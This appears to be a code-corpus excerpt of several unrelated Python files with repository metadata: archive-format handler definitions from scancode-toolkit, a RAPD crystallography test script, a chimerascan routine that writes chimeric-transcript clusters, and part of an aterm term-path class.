mimetypes=('application/x-lzma',) ,
extensions=('tar.lzma', '.tlz', '.tarlz', '.tarlzma',),
kind=regular_nested,
extractors=[extract_lzma, extract_tar],
strict=False
)
TarGzipHandler = Handler(
name='Tar gzip',
filetypes=('gzip compressed',),
mimetypes=('application/x-gzip',),
extensions=('.tgz', '.tar.gz', '.tar.gzip', '.targz', '.targzip', '.tgzip',),
kind=regular_nested,
extractors=[extract_tar],
strict=False
)
# https://wiki.openwrt.org/doc/techref/opkg: ipk
# http://downloads.openwrt.org/snapshots/trunk/x86/64/packages/base/
OpkgHandler = Handler(
name='OPKG package',
filetypes=('gzip compressed',),
mimetypes=('application/x-gzip',),
extensions=('.ipk',),
kind=regular_nested,
extractors=[extract_tar],
strict=False
)
GzipHandler = Handler(
name='Gzip',
filetypes=('gzip compressed', 'gzip compressed data'),
mimetypes=('application/x-gzip',),
extensions=('.gz', '.gzip', '.wmz'),
kind=regular,
extractors=[uncompress_gzip],
strict=False
)
DiaDocHandler = Handler(
name='Dia diagram doc',
filetypes=('gzip compressed',),
mimetypes=('application/x-gzip',),
extensions=('.dia',),
kind=docs,
extractors=[uncompress_gzip],
strict=True
)
BzipHandler = Handler(
name='bzip2',
filetypes=('bzip2 compressed',),
mimetypes=('application/x-bzip2',),
extensions=('.bz', '.bz2', 'bzip2',),
kind=regular,
extractors=[uncompress_bzip2],
strict=False
)
TarBzipHandler = Handler(
name='Tar bzip2',
filetypes=('bzip2 compressed',),
mimetypes=('application/x-bzip2',),
extensions=('.tar.bz2', '.tar.bz', '.tar.bzip', '.tar.bzip2',
'.tbz', '.tbz2', '.tb2', '.tarbz2',),
kind=regular_nested,
extractors=[extract_tar],
strict=False
)
RarHandler = Handler(
name='RAR',
filetypes=('rar archive',),
mimetypes=('application/x-rar',),
extensions=('.rar',),
kind=regular,
extractors=[extract_rar],
strict=False
)
CabHandler = Handler(
name='Microsoft cab',
filetypes=('microsoft cabinet',),
mimetypes=('application/vnd.ms-cab-compressed',),
extensions=('.cab',),
kind=package,
extractors=[extract_cab],
strict=True
)
MsiInstallerHandler = Handler(
name='Microsoft MSI Installer',
filetypes=('msi installer',),
mimetypes=('application/x-msi',),
extensions=('.msi',),
kind=package,
extractors=[extract_msi],
strict=True
)
InstallShieldHandler = Handler(
name='InstallShield Installer',
filetypes=('installshield',),
mimetypes=('application/x-dosexec',),
extensions=('.exe',),
kind=special_package,
extractors=[extract_ishield],
strict=True
)
NugetHandler = Handler(
name='Nuget',
# weirdly enough the detection by libmagic is sometimes wrong
# TODO file a bug upstream
# this is due to this: https://en.wikipedia.org/wiki/Open_Packaging_Conventions#File_formats_using_the_OPC
# being recognized by libmagic as an OOXML file
filetypes=('zip archive', 'microsoft ooxml',),
mimetypes=('application/zip', 'application/octet-stream',),
extensions=('.nupkg',),
kind=package,
extractors=[extract_zip],
strict=True
)
NSISInstallerHandler = Handler(
name='Nullsoft Installer',
filetypes=('nullsoft installer',),
mimetypes=('application/x-dosexec',),
extensions=('.exe',),
kind=special_package,
extractors=[extract_nsis],
strict=True
)
ArHandler = Handler(
name='ar archive',
filetypes=('current ar archive',),
mimetypes=('application/x-archive',),
extensions=('.ar',),
kind=regular,
extractors=[extract_ar],
strict=False
)
StaticLibHandler = Handler(
name='Static Library',
filetypes=('current ar archive', 'current ar archive random library',),
mimetypes=('application/x-archive',),
extensions=('.a', '.lib', '.out', '.ka',),
kind=package,
extractors=[extract_ar],
strict=True
)
DebHandler = Handler(
name='Debian package',
filetypes=('debian binary package',),
mimetypes=('application/x-archive', 'application/vnd.debian.binary-package',),
extensions=('.deb', '.udeb',),
kind=package,
extractors=[extract_deb],
strict=True
)
RpmHandler = Handler(
name='RPM package',
filetypes=('rpm ',),
mimetypes=('application/x-rpm',),
extensions=('.rpm', '.srpm', '.mvl', '.vip',),
kind=package,
extractors=[extract_rpm, extract_cpio],
strict=False
)
SevenZipHandler = Handler(
name='7zip',
filetypes=('7-zip archive',),
mimetypes=('application/x-7z-compressed',),
extensions=('.7z',),
kind=regular,
extractors=[extract_7z],
strict=False
)
TarSevenZipHandler = Handler(
name='Tar 7zip',
filetypes=('7-zip archive',),
mimetypes=('application/x-7z-compressed',),
extensions=('.tar.7z', '.tar.7zip', '.t7z',),
kind=regular_nested,
extractors=[extract_7z, extract_tar],
strict=True
)
SharHandler = Handler(
name='shar shell archive',
filetypes=('posix shell script',),
mimetypes=('text/x-shellscript',),
extensions=('.sha', '.shar', '.bin',),
kind=special_package,
extractors=[],
strict=True
)
CpioHandler = Handler(
name='cpio',
filetypes=('cpio archive',),
mimetypes=('application/x-cpio',),
extensions=('.cpio',),
kind=regular,
extractors=[extract_cpio],
strict=False
)
ZHandler = Handler(
name='Z',
filetypes=("compress'd data",),
mimetypes=('application/x-compress',),
extensions=('.z',),
kind=regular,
extractors=[extract_Z],
strict=False
)
TarZHandler = Handler(
name='Tar Z',
filetypes=("compress'd data",),
mimetypes=('application/x-compress',),
extensions=('.tz', '.tar.z', '.tarz',),
kind=regular_nested,
extractors=[extract_Z, extract_tar],
strict=False
)
AppleDmgHandler = Handler(
name='Apple dmg',
filetypes=('zlib compressed',),
mimetypes=('application/zlib',),
extensions=('.dmg', '.sparseimage',),
kind=package,
extractors=[extract_iso],
strict=True
)
ApplePkgHandler = Handler(
name='Apple pkg or mpkg package installer',
filetypes=('xar archive',),
mimetypes=('application/octet-stream',),
extensions=('.pkg', '.mpkg',),
kind=package,
extractors=[extract_xarpkg],
strict=True
)
XarHandler = Handler(
name='Xar archive v1',
filetypes=('xar archive',),
mimetypes=('application/octet-stream',),
extensions=('.xar',),
kind=package,
extractors=[extract_xarpkg],
strict=True
)
IsoImageHandler = Handler(
name='ISO CD image',
filetypes=('iso 9660 cd-rom', 'high sierra cd-rom',),
mimetypes=('application/x-iso9660-image',),
extensions=('.iso', '.udf', '.img',),
kind=file_system,
extractors=[extract_iso],
strict=True
)
SquashfsHandler = Handler(
name='squashfs FS',
filetypes=('squashfs',),
mimetypes=(),
extensions=(),
kind=file_system,
extractors=[extract_squashfs],
strict=False
)
PatchHandler = Handler(
name='Patch',
filetypes=('diff', 'patch',),
mimetypes=('text/x-diff',),
extensions=('.diff', '.patch',),
kind=patches,
extractors=[extract_patch],
strict=True
)
# Actual list of handlers
# NOTE(review): the ordering looks deliberate (e.g. Apple pkg before plain
# Xar, nested tar.* variants near their base handlers) -- confirm handler
# selection semantics before reordering.
archive_handlers = [
    TarHandler,
    RubyGemHandler,
    ZipHandler,
    OfficeDocHandler,
    AndroidAppHandler,
    AndroidLibHandler,
    MozillaExtHandler,
    # not supported for now
    # ChromeExtHandler,
    IosAppHandler,
    JavaJarHandler,
    JavaJarZipHandler,
    SpringBootShellJarHandler,
    JavaWebHandler,
    PythonHandler,
    XzHandler,
    LzmaHandler,
    TarXzHandler,
    TarLzmaHandler,
    TarGzipHandler,
    GzipHandler,
    DiaDocHandler,
    BzipHandler,
    TarBzipHandler,
    RarHandler,
    CabHandler,
    MsiInstallerHandler,
    ApplePkgHandler,
    XarHandler,
    # notes: this may catch all exe and fails too often
    InstallShieldHandler,
    NSISInstallerHandler,
    NugetHandler,
    ArHandler,
    StaticLibHandler,
    DebHandler,
    RpmHandler,
    SevenZipHandler,
    TarSevenZipHandler,
    # not supported for now
    # SharHandler,
    CpioHandler,
    ZHandler,
    TarZHandler,
    AppleDmgHandler,
    IsoImageHandler,
    SquashfsHandler,
    PatchHandler
]
|
yashdsaraf/scancode-toolkit
|
src/extractcode/archive.py
|
Python
|
apache-2.0
| 29,018
|
[
"VisIt"
] |
a06404caf027f05aa1704f61f7bbf06a3735075a456d57839e684c0845aff353
|
# Ad-hoc RAPD developer test driver (Python 2): sets up logging, a cluster
# launcher and a Redis connection, then runs one of several experiments.
# All but the final run_phaser experiment are disabled via triple-quoted
# string blocks below.
import utils.archive as archive
import os, sys
import shutil
from pprint import pprint
import importlib
import random
import json
import time
from multiprocessing import Queue, Process
import logging
import logging.handlers
from utils.processes import local_subprocess, mp_pool
#from utils.xutils import convert_unicode
import utils.xutils as xutils
import utils.log
# The pdbquery plugin
#logger = logging.getLogger("RAPDLogger")
#logger.debug("__init__")
#LOG_FILENAME = '/gpfs6/users/necat/Jon/RAPD_test/Output/rapd.log'
#logger = logging.getLogger("RAPDLogger")
#logger.debug("__init__")
## Add the log message handler to the logger
#handler = logging.handlers.RotatingFileHandler(LOG_FILENAME, maxBytes=100000, backupCount=5)
##add a formatter
#formatter = logging.Formatter("%(asctime)s - %(message)s")
#handler.setFormatter(formatter)
#logger.addHandler(handler)
# Set up logging
logger = utils.log.get_logger(logfile_dir="/gpfs6/users/necat/Jon/RAPD_test/Output",
                              logfile_id="rapd_mr",
                              level=1,
                              #console=commandline_args.test
                              console=False)
# Setup cluster
import sites.necat as site
from utils.modules import load_module
cluster_launcher = load_module(site.CLUSTER_ADAPTER)
launcher = cluster_launcher.process_cluster
# Setup local_subprocess
#launcher = local_subprocess
# Setup redis
redis_database = importlib.import_module('database.redis_adapter')
#redis_database = redis_database.Database(settings=site.CONTROL_DATABASE_SETTINGS)
redis = redis_database.Database(settings=site.CONTROL_DATABASE_SETTINGS)
#redis = redis_database.connect_to_redis()
# --- disabled experiment: get_pdb_info on a cif/pdb file ---
"""
cif = '/gpfs6/users/necat/rapd2/integrate/2018-06-06/JDO_PUCK2_A14_Run4_1/rapd_pdbquery_JDO_PUCK2_A14_Run4_1_free/Phaser_1Z7E/1z7e.cif'
l = ['2FGE_E', '2FGE']
for i in l:
    print i.split('_')[0]
    print len(i.split('_'))
    if len(i.split('_')) not in [1]:
        print 'gh'
from plugins.subcontractors.rapd_cctbx import get_pdb_info
pdb_info = get_pdb_info(#cif_file='/gpfs6/users/necat/rapd2/integrate/2018-06-06/JDO_PUCK2_A14_Run4_1/rapd_pdbquery_JDO_PUCK2_A14_Run4_1_free/Phaser_1Z7E/1z7e.cif',
                        #cif_file='/gpfs6/users/necat/Jon/RAPD_test/Output/2yep.cif',
                        cif_file='/gpfs6/users/necat/Jon/RAPD_test/Pdb/thau.pdb',
                        dres=6.0,
                        matthews=True,
                        chains=False,
                        #data_file='/gpfs6/users/necat/rapd2/integrate/2018-06-05/JDO_PUCK2_A14_Run4_1/JDO_PUCK2_A14_Run4_1/JDO_PUCK2_A14_Run4_1_free.mtz',
                        #data_file='/gpfs5/users/necat/rapd/copper/trunk/integrate/2018-06-07/P113_11_1/P113_11_1/P113_11_1_free.mtz',
                        data_file = '/gpfs6/users/necat/Jon/RAPD_test/Datasets/MR/thau_free.mtz'
                        )
pprint(pdb_info)
"""
# --- disabled experiment: tNCS check via run_phaser_module ---
"""
from plugins.subcontractors.rapd_phaser import run_phaser_module
tncs = run_phaser_module(data_file='/gpfs6/users/necat/Jon/RAPD_test/Datasets/MR/thau_free.mtz',
                         tncs=True)
print tncs
"""
# --- disabled experiment: Redis cleanup and spacegroup subgroup lookup ---
"""
# Cleanup Redis
l = redis.keys('Phaser_*')
for k in l:
    redis.delete(k)
print redis.keys('Phaser_*')
print redis.get('Phaser_8858')
#os.chdir('/gpfs6/users/necat/Jon/RAPD_test/Output/Phaser_test/rapd_pdbquery_P113_11_1_free')
#pprint(json.loads(open('result.json', 'r').read()))
from plugins.subcontractors.rapd_cctbx import get_pdb_info, get_mtz_info
mtz = '/gpfs5/users/necat/rapd/copper/trunk/integrate/2018-06-07/P113_11_1/P113_11_1/P113_11_1_free.mtz'
input_spacegroup, cell, volume = get_mtz_info(mtz)
input_spacegroup_num = xutils.convert_spacegroup(input_spacegroup)
print xutils.get_sub_groups(input_spacegroup_num, "simple")
"""
# --- disabled experiment: analysis plugin run ---
"""
# RUN Analysis
import plugins.analysis.plugin
import plugins.analysis.commandline
# Construct the pdbquery plugin command
class AnalysisArgs(object):
    #Object containing settings for plugin command construction
    clean = True
    #datafile = '/gpfs6/users/necat/Jon/process/rapd/integrate/ehdbr1_7rna_1/ehdbr1_7rna_free.mtz'
    datafile = '/gpfs6/users/necat/Jon/RAPD_test/Datasets/MR/thau_free.mtz'
    dir_up = False
    json = False
    nproc = 8
    #pdbquery = True #TODO
    progress = False
    #queue = plugin_queue
    run_mode = 'server'
    sample_type = "default"
    show_plots = False
    test = False
    computer_cluster = True
    db_settings = site.CONTROL_DATABASE_SETTINGS
analysis_command = plugins.analysis.commandline.construct_command(AnalysisArgs)
# The analysis plugin
plugin = plugins.analysis.plugin
# Run the plugin
plugin_instance = plugin.RapdPlugin(analysis_command,
                                    launcher=launcher,
                                    tprint=False,
                                    logger=logger)
plugin_instance.start()
#analysis_result = plugin_queue.get()
#print analysis_result
"""
# --- disabled experiment: pdbquery plugin run ---
"""
# RUN PDBQuery
import plugins.pdbquery.plugin
import plugins.pdbquery.commandline
os.chdir('/gpfs6/users/necat/Jon/RAPD_test/Output/Phaser_test')
#launcher = local_subprocess
# Construct the pdbquery plugin command
class PdbqueryArgs(object):
    #Object for command construction
    clean = True
    #datafile = '/gpfs5/users/necat/rapd/copper/trunk/integrate/2018-06-07/P113_11_1/P113_11_1/P113_11_1_free.mtz'
    #data_file = '/gpfs6/users/necat/Jon/RAPD_test/Datasets/MR/thau_free.mtz'
    #data_file = '/gpfs6/users/necat/Jon/RAPD_test/Output/thaum1_01s-01d_1_mergable.mtz'
    data_file = '/gpfs6/users/necat/Jon/RAPD_test/Output/thau_free.mtz'
    dir_up = False
    json = False
    nproc = 2
    progress = False
    run_mode = 'server'
    pdbs = False
    #pdbs = ['1111', '2qk9']
    contaminants = True
    ##run_mode = None
    search = True
    test = True
    #verbose = True
    #no_color = False
    db_settings = site.CONTROL_DATABASE_SETTINGS
    #output_id = False
    exchange_dir = '/gpfs6/users/necat/rapd2/exchange_dir'
pdbquery_command = plugins.pdbquery.commandline.construct_command(PdbqueryArgs)
# The pdbquery plugin
plugin = plugins.pdbquery.plugin
# Run the plugin
plugin_instance = plugin.RapdPlugin(site=site,
                                    command=pdbquery_command,
                                    logger=logger)
plugin_instance.start()
"""
# --- disabled experiment: anomalous difference map calculation ---
"""
data_file = '/gpfs6/users/necat/Jon/RAPD_test/Datasets/MR/thau_free.mtz'
pdb = '/gpfs6/users/necat/Jon/RAPD_test/Output/rapd_mr_thau_free/P41212_all_0/P41212_all_0.1.pdb'
mtz = '/gpfs6/users/necat/Jon/RAPD_test/Output/rapd_mr_thau_free/P41212_all_0/P41212_all_0.1.mtz'
os.chdir('/gpfs6/users/necat/Jon/RAPD_test/Output/rapd_mr_thau_free/P41212_all_0')
adf_results = xutils.calc_ADF_map(data_file=data_file,
                                  mtz=mtz,
                                  pdb=pdb)
print adf_results
"""
# --- disabled experiment: MR plugin run ---
"""
#RUN MR
import plugins.mr.plugin
import plugins.mr.commandline
import uuid
os.chdir('/gpfs6/users/necat/Jon/RAPD_test/Output/Phaser_test')
#launcher = local_subprocess
# Construct the pdbquery plugin command
class MRArgs(object):
    #Object for command construction
    clean = False
    #datafile = '/gpfs5/users/necat/rapd/copper/trunk/integrate/2018-06-07/P113_11_1/P113_11_1/P113_11_1_free.mtz'
    data_file = '/gpfs6/users/necat/Jon/RAPD_test/Datasets/MR/thau_free.mtz'
    struct_file = '/gpfs6/users/necat/Jon/RAPD_test/Pdb/thau.pdb'
    dir_up = False
    json = False
    nproc = 11
    adf = False
    progress = False
    run_mode = 'server'
    #pdbs = False
    #pdbs = ['1111', '2qk9']
    #contaminants = True
    ##run_mode = None
    #search = True
    test = False
    #verbose = True
    #no_color = False
    db_settings = site.CONTROL_DATABASE_SETTINGS
    #output_id = False
    exchange_dir = '/gpfs6/users/necat/rapd2/exchange_dir'
mr_command = plugins.mr.commandline.construct_command(MRArgs)
# The pdbquery plugin
plugin = plugins.mr.plugin
# Run the plugin
plugin_instance = plugin.RapdPlugin(site=site,
                                    command=mr_command)
plugin_instance.start()
"""
# --- active experiment: direct run_phaser invocation ---
from plugins.subcontractors.rapd_phaser import run_phaser
# Setup local_subprocess
launcher = local_subprocess
pool = mp_pool(1)
os.chdir('/gpfs6/users/necat/Jon/RAPD_test/Output')
job_description = {
    #"work_dir": '/gpfs6/users/necat/Jon/RAPD_test/Output/Phaser_test',
    "work_dir": '/gpfs6/users/necat/rapd2/integrate/2020-10-14/SAD020_16_1/rapd_pdbquery_SAD020_16_1_free/Phaser_4NPR',
    # NOTE(review): duplicate "data_file" key below -- the second ('')
    # silently wins; confirm which value is intended.
    "data_file": '/gpfs6/users/necat/Jon/RAPD_test/Datasets/MR/thau_free.mtz',
    "data_file": '',
    #"cif": "/gpfs5/users/necat/rapd/pdbq/pdb/th/1thw.cif",
    #"pdb": "/gpfs6/users/necat/Jon/RAPD_test/Pdb/thau.pdb",
    "pdb": "/gpfs6/users/necat/Jon/RAPD_test/Pdb/thau.pdb",
    "struct_file": '/gpfs6/users/necat/rapd2/integrate/2020-10-14/SAD020_16_1/rapd_pdbquery_SAD020_16_1_free/Phaser_4NPR/4npr.cif',
    #"name": 'junk',
    "name": '4NPR',
    #"spacegroup": 'P422',
    "spacegroup": 'P222',
    "ncopy": 1,
    "test": False,
    "cell_analysis": True,
    "large_cell": False,
    "resolution": 6.0,
    #"timeout": self.phaser_timer,
    #"launcher": self.command["preferences"].get("launcher", False)
    "launcher": launcher,
    "computer_cluster": False,
    "pool": pool,
    #"results_queue": queue,
    "db_settings": site.CONTROL_DATABASE_SETTINGS,
    "output_id": False
    }
#Thread(target=run_phaser_pdbquery, kwargs=job_description).start()
job, pid, output_id = run_phaser(**job_description)
print job
#print job.ready()
# Poll the async result until the phaser job finishes
while not job.ready():
    print 'sleeping...'
    time.sleep(1)
print job.successful()
#print dir(job)
#print pid
#print job.get()
#print output_id
pool.close()
pool.join()
|
RAPD/RAPD
|
src/test2.py
|
Python
|
agpl-3.0
| 10,111
|
[
"ADF"
] |
cea75baf3b4520dd82b4292153ca63f63f62e9cddd32450f3f49c2b3a1b12f57
|
'''
Created on Jul 1, 2011
@author: mkiyer
chimerascan: chimeric transcript discovery using RNA-seq
Copyright (C) 2011 Matthew Iyer
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import logging
import os
import sys
import operator
import collections
import pysam
from chimerascan.lib.chimera import Chimera, get_chimera_type
from chimerascan.lib.feature import TranscriptFeature
from chimerascan.lib import config
from chimerascan.lib.transcriptome import build_transcript_genome_map, \
build_genome_transcript_trees, build_transcript_map, transcript_to_genome_pos
from chimerascan.pipeline.filter_chimeras import get_wildtype_frags
def get_chimera_groups(input_file, tx_id_map):
    """Group chimeras whose 5'/3' partners fall in the same genomic clusters.

    Parameters:
        input_file: path to a Chimera-format text file parsable by
            Chimera.parse()
        tx_id_map: dict mapping transcript name -> transcript feature;
            each feature must expose a `cluster_id` attribute

    Yields:
        ((cluster5p, cluster3p), [Chimera, ...]) tuples, one per distinct
        pair of overlapping-gene clusters.
    """
    # group chimeras in the same genomic cluster with the same breakpoint
    cluster_chimera_dict = collections.defaultdict(list)
    for c in Chimera.parse(open(input_file)):
        # get cluster of overlapping genes for each side of the chimera
        cluster5p = tx_id_map[c.tx_name_5p].cluster_id
        cluster3p = tx_id_map[c.tx_name_3p].cluster_id
        # add to dictionary
        cluster_chimera_dict[(cluster5p,cluster3p)].append(c)
    # .items() works on both Python 2 and 3 (original used Py2-only .iteritems())
    for key,chimeras in cluster_chimera_dict.items():
        yield key,chimeras
def get_best_coverage_chimera(chimeras):
    """Return the chimera with the most unique alignment positions,
    breaking ties by total fragment count.
    """
    # TODO: come up with a way to prioritize here (spanning included?)
    ranked = sorted(
        chimeras,
        key=lambda chimera: (chimera.get_num_unique_positions(),
                             chimera.get_num_frags()),
        reverse=True)
    # sorted() is stable, so ties resolve to the earliest input element,
    # matching the original implementation's behavior
    return ranked[0]
def write_output(input_file, bam_file, output_file, index_dir):
    """Cluster chimera isoforms by gene-cluster pair and write one
    BEDPE-style line per cluster to output_file (Python 2 syntax).

    input_file: chimera text file; bam_file: alignments used to count
    wild-type fragments; index_dir: directory holding the transcript
    feature file. Returns config.JOB_SUCCESS.
    """
    # read transcripts
    logging.debug("Reading transcripts")
    transcript_file = os.path.join(index_dir, config.TRANSCRIPT_FEATURE_FILE)
    transcripts = list(TranscriptFeature.parse(open(transcript_file)))
    # build a lookup table to get genome coordinates from transcript
    # coordinates
    transcript_genome_map = build_transcript_genome_map(transcripts)
    tx_id_map = build_transcript_map(transcripts)
    genome_tx_trees = build_genome_transcript_trees(transcripts)
    # open BAM file for checking wild-type isoform
    bamfh = pysam.Samfile(bam_file, "rb")
    # group chimera isoforms together
    lines = []
    chimera_clusters = 0
    for key,chimeras in get_chimera_groups(input_file, tx_id_map):
        # collect the union of transcripts/genes/names across the cluster
        txs5p = set()
        txs3p = set()
        genes5p = set()
        genes3p = set()
        names = set()
        for c in chimeras:
            txs5p.add("%s:%d-%d" % (c.tx_name_5p, c.tx_start_5p, c.tx_end_5p-1))
            txs3p.add("%s:%d-%d" % (c.tx_name_3p, c.tx_start_3p, c.tx_end_3p-1))
            genes5p.add(c.gene_name_5p)
            genes3p.add(c.gene_name_3p)
            names.add(c.name)
        # NOTE: rebinds the loop variable c to the representative chimera
        c = get_best_coverage_chimera(chimeras)
        # get chimera type and distance between genes
        chimera_type, distance = get_chimera_type(tx_id_map[c.tx_name_5p],
                                                  tx_id_map[c.tx_name_3p],
                                                  genome_tx_trees)
        # get genomic positions of chimera
        chrom5p,strand5p,start5p = transcript_to_genome_pos(c.tx_name_5p, c.tx_start_5p, transcript_genome_map)
        chrom5p,strand5p,end5p = transcript_to_genome_pos(c.tx_name_5p, c.tx_end_5p-1, transcript_genome_map)
        # strand == 1 appears to denote the minus strand: swap so start <= end
        if strand5p == 1:
            start5p,end5p = end5p,start5p
        chrom3p,strand3p,start3p = transcript_to_genome_pos(c.tx_name_3p, c.tx_start_3p, transcript_genome_map)
        chrom3p,strand3p,end3p = transcript_to_genome_pos(c.tx_name_3p, c.tx_end_3p-1, transcript_genome_map)
        if strand3p == 1:
            start3p,end3p = end3p,start3p
        # get breakpoint spanning sequences (deduplicated by read sequence)
        spanning_seqs = set()
        spanning_fasta_lines = []
        for dr in c.get_spanning_reads():
            if dr.seq in spanning_seqs:
                continue
            spanning_seqs.add(dr.seq)
            spanning_fasta_lines.extend([">%s/%d;pos=%d;strand=%s" %
                                         (dr.qname, dr.readnum+1, dr.pos,
                                          "-" if dr.is_reverse else "+"),
                                         dr.seq])
        # get isoform fraction: chimeric frags over chimeric + wild-type frags
        num_wt_frags_5p, num_wt_frags_3p = get_wildtype_frags(c, bamfh)
        num_chimeric_frags = c.get_num_frags()
        frac5p = float(num_chimeric_frags) / (num_chimeric_frags + num_wt_frags_5p)
        frac3p = float(num_chimeric_frags) / (num_chimeric_frags + num_wt_frags_3p)
        # setup fields of BEDPE file
        fields = [chrom5p, start5p, end5p,
                  chrom3p, start3p, end3p,
                  "CLUSTER%d" % (chimera_clusters),
                  c.get_num_frags(),
                  "+" if (strand5p == 0) else "-",
                  "+" if (strand3p == 0) else "-",
                  ','.join(txs5p),
                  ','.join(txs3p),
                  ','.join(genes5p),
                  ','.join(genes3p),
                  chimera_type, distance,
                  c.get_num_frags(),
                  c.get_num_spanning_frags(),
                  c.get_num_unique_positions(),
                  frac5p, frac3p,
                  ','.join(spanning_fasta_lines),
                  ','.join(names)]
        lines.append(fields)
        chimera_clusters += 1
    bamfh.close()
    logging.debug("Clustered chimeras: %d" % (chimera_clusters))
    # sort by unique positions (18), spanning frags (17), then total frags (16)
    lines = sorted(lines, key=operator.itemgetter(18, 17, 16), reverse=True)
    f = open(output_file, "w")
    print >>f, '\t'.join(['#chrom5p', 'start5p', 'end5p',
                          'chrom3p', 'start3p', 'end3p',
                          'chimera_cluster_id', 'score',
                          'strand5p', 'strand3p',
                          'transcript_ids_5p', 'transcript_ids_3p',
                          'genes5p', 'genes3p',
                          'type', 'distance',
                          'total_frags',
                          'spanning_frags',
                          'unique_alignment_positions',
                          'isoform_fraction_5p',
                          'isoform_fraction_3p',
                          'breakpoint_spanning_reads',
                          'chimera_ids'])
    for fields in lines:
        print >>f, '\t'.join(map(str, fields))
    f.close()
    return config.JOB_SUCCESS
def main():
    """Command-line entry point.

    Usage: prog [options] <index_dir> <in.txt> <bam_file> <out.txt>
    Returns write_output()'s status code (config.JOB_SUCCESS on success).
    """
    from optparse import OptionParser
    logging.basicConfig(level=logging.DEBUG,
                        format="%(asctime)s - %(name)s - %(levelname)s - %(message)s")
    parser = OptionParser("usage: %prog [options] <index_dir> <in.txt> <bam_file> <out.txt>")
    options, args = parser.parse_args()
    # Fail with a usage message instead of an IndexError when arguments
    # are missing (or extras are supplied).
    if len(args) != 4:
        parser.error("expected 4 arguments: <index_dir> <in.txt> <bam_file> <out.txt>")
    index_dir, input_file, bam_file, output_file = args
    return write_output(input_file, bam_file, output_file, index_dir)
if __name__ == "__main__":
    sys.exit(main())
|
tectronics/chimerascan
|
chimerascan/deprecated/write_output_v1.py
|
Python
|
gpl-3.0
| 7,533
|
[
"pysam"
] |
851f13ee7ab4dee597822cf8f5f9a4d1ffd85892db5ef3921f84ca64136cfc09
|
'''Term paths.'''
import itertools
from aterm.factory import factory
from aterm import types
from aterm import visitor
from aterm import project
from aterm import annotation
# Result codes for Path.compare(self, other); each describes where *other*
# lies relative to *self*.
PRECEDENT = -2   # other comes before self
ANCESTOR = -1    # other encloses self (other is a prefix of self)
EQUAL = 0        # identical paths
DESCENDENT = 1   # other lies inside self (self is a prefix of other)
SUBSEQUENT = 2   # other comes after self
class _Transformer(visitor.IncrementalVisitor):
	'''Visitor that applies a callable to the child term at a fixed index.'''

	def __init__(self, index, func):
		visitor.IncrementalVisitor.__init__(self)
		self.index = index
		self.func = func

	def __call__(self, term):
		# Start walking from child position zero.
		return self.visit(term, 0)

	def visitTerm(self, term, index):
		# Only lists and applications have indexable children.
		raise TypeError('not a term list or application', term)

	def visitNil(self, term, index):
		# Reached the end of the list before reaching self.index.
		raise IndexError('index out of range', index)

	def visitHead(self, term, index):
		# Apply the transformation only at the target position.
		return self.func(term) if index == self.index else term

	def visitTail(self, term, index):
		# Keep descending until the target position has been passed.
		if index < self.index:
			return self.visit(term, index + 1)
		return term

	def visitAppl(self, term, index):
		current = term.args[self.index]
		replacement = self.func(current)
		if replacement is current:
			# Unchanged argument: return the original term to keep sharing.
			return term
		new_args = list(term.args)
		new_args[self.index] = replacement
		return term.factory.makeAppl(term.name, new_args, term.annotations)
class Path(object):
	'''A path is a term comprehending a list of integer indexes which indicate
	the position of a term relative to the root term.
	When a path is read/written to a string/list, indexes are listed ordely from
	the root to the leaves. However, when a path is read/written to a term, the
	indexes are from the leaves to the root, to take advantage of the maximal
	sharing.
	'''

	__slots__ = ['indices']

	def __init__(self, indices):
		# indices are stored root-first (see class docstring)
		self.indices = indices

	def compare(self, other):
		'''Rich path comparison.
		Returns PRECEDENT/ANCESTOR/EQUAL/DESCENDENT/SUBSEQUENT, describing
		where *other* lies relative to *self*.
		'''
		assert isinstance(other, Path)
		otherit = iter(other.indices)
		for selfelm in iter(self.indices):
			try:
				# next(it) instead of it.next() so this works on Python 2 and 3
				otherelm = next(otherit)
			except StopIteration:
				# other ran out of indices first: it encloses self
				return ANCESTOR
			if otherelm < selfelm:
				return PRECEDENT
			if otherelm > selfelm:
				return SUBSEQUENT
		try:
			next(otherit)
		except StopIteration:
			pass
		else:
			# other is strictly longer: it lies inside self
			return DESCENDENT
		return EQUAL

	def equals(self, other):
		return self.compare(other) == EQUAL

	__eq__ = equals

	def contains(self, other):
		'''Whether other is self or a subterm of self.'''
		return self.compare(other) in (DESCENDENT, EQUAL)

	def contained(self, other):
		'''Whether self is other or a subterm of other.'''
		return self.compare(other) in (ANCESTOR, EQUAL)

	def contains_range(self, start, end):
		'''Whether self contains both endpoints of the range.'''
		# BUG FIX: the original evaluated self.contains(self, end), which
		# always raised TypeError (extra positional argument); the intent
		# is clearly to test the end path as well.
		return self.contains(start) and self.contains(end)

	def contained_in_range(self, start, end):
		return (
			self.compare(start) in (ANCESTOR, EQUAL, PRECEDENT) and
			self.compare(end) in (ANCESTOR, EQUAL, SUBSEQUENT)
		)

	def ancestor(self, other):
		'''Find the common ancestor of two paths.'''
		res = []
		for i1, i2 in zip(self.indices, other.indices):
			if i1 != i2:
				break
			res.append(i1)
		return Path(res)

	def project(self, term):
		'''Projects the subterm specified by a path.'''
		for index in self.indices:
			term = project.subterm(term, index)
		return term

	def transform(self, term, func):
		'''Apply func to the subterm addressed by this path, wrapping one
		_Transformer per path element so the spine is rebuilt leaf-to-root.'''
		for index in reversed(self.indices):
			func = _Transformer(index, func)
		return func(term)

	@classmethod
	def fromTerm(cls, trm):
		'''Build a Path from its (leaf-first) term-list encoding.'''
		res = []
		tail = trm
		while not types.isNil(tail):
			if not types.isCons(tail):
				raise ValueError('bad path', trm)
			idx = tail.head
			if not types.isInt(idx):
				raise ValueError('bad index', idx)
			res.append(idx.value)
			tail = tail.tail
		# term encoding is leaf-first; indices are stored root-first
		res.reverse()
		return cls(res)

	def toTerm(self):
		'''Encode the path as a (leaf-first) term list.'''
		res = factory.makeNil()
		for index in self.indices:
			res = factory.makeCons(factory.makeInt(index), res)
		return res

	@classmethod
	def fromStr(cls, s):
		'''Parse a path from a "/1/2/" style string.'''
		res = [int(x) for x in s.split('/') if x != '']
		return cls(res)

	def toStr(self):
		'''Format the path as a "/1/2/" style string.'''
